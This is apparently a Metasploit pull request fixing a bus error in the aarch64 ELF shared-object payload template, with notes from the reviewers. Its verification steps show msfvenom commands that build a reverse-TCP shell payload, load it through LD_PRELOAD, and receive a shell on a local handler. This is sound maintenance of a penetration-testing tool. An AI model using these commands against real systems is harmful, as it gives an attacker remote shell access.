Fix aarch64 elf shared object bus error

[adfoster-r7]

closes #18513

Fixes an aarch64 elf shared object bus crash when generating a payload with msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf-so -o payload.so and running LD_PRELOAD=./payload.so /bin/ls for code execution

New template generated with:

nasm data/templates/src/elf/dll/elf_dll_aarch64_template.s -f bin -o data/templates/template_aarch64_linux_dll.bin

Paired with @dwelch-r7

Verification

On an ARM machine

Create handler

ubuntu@ip-172-31-3-235:~$ msfconsole -q
[*] Starting persistent handler(s)...
use linux/aarch64/shell_reverse_tcp
setmsf6 > use linux/aarch64/shell_reverse_tcp
 lmsf6 payload(linux/aarch64/shell_reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(linux/aarch64/shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(linux/aarch64/shell_reverse_tcp) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 

Generate payload and execute:

msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf-so -o payload-with-alignment.elf
readelf -a /home/ubuntu/payload-with-alignment.elf
LD_PRELOAD=/home/ubuntu/payload-with-alignment.elf ./easy

Receive shell:

msf6 payload(linux/aarch64/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

whoami
ubuntu

Difference:

ubuntu@ip-172-31-3-235:~$ readelf -a ./payload.so
 ELF Header:
   Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
   Class:                             ELF64
   Data:                              2's complement, little endian
   Version:                           1 (current)
   OS/ABI:                            UNIX - System V
   ABI Version:                       0
   Type:                              DYN (Shared object file)
   Machine:                           AArch64
   Version:                           0x1
-   Entry point address:               0x192
+   Entry point address:               0x1a0

 ... etc etc ...
 Program Headers:
   Type           Offset             VirtAddr           PhysAddr
                  FileSiz            MemSiz              Flags  Align
   LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
-                 0x000000000000022a 0x00000000000002c2  RWE    0x1000
+                 0x0000000000000238 0x00000000000002d0  RWE    0x1000
   DYNAMIC        0x0000000000000130 0x0000000000000130 0x0000000000000130


... etc etc ...

[adfoster-r7]

We haven't been able to work out definitively if this should be aligned to 4, 8, or 16 - but it definitely needs to be aligned to work

[smcintyre-r7]

I was able to reproduce the original error and validate that these changes fix it. I also checked the x64 equivalent to see if it had the same problem given that the headers were the same. It was unaffected by this issue leading me to think it's related to the architecture and not the ELF executable file format.

I'll get this landed as is, thanks for tracking it down and fixing it.

[smcintyre-r7]

Release Notes

This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.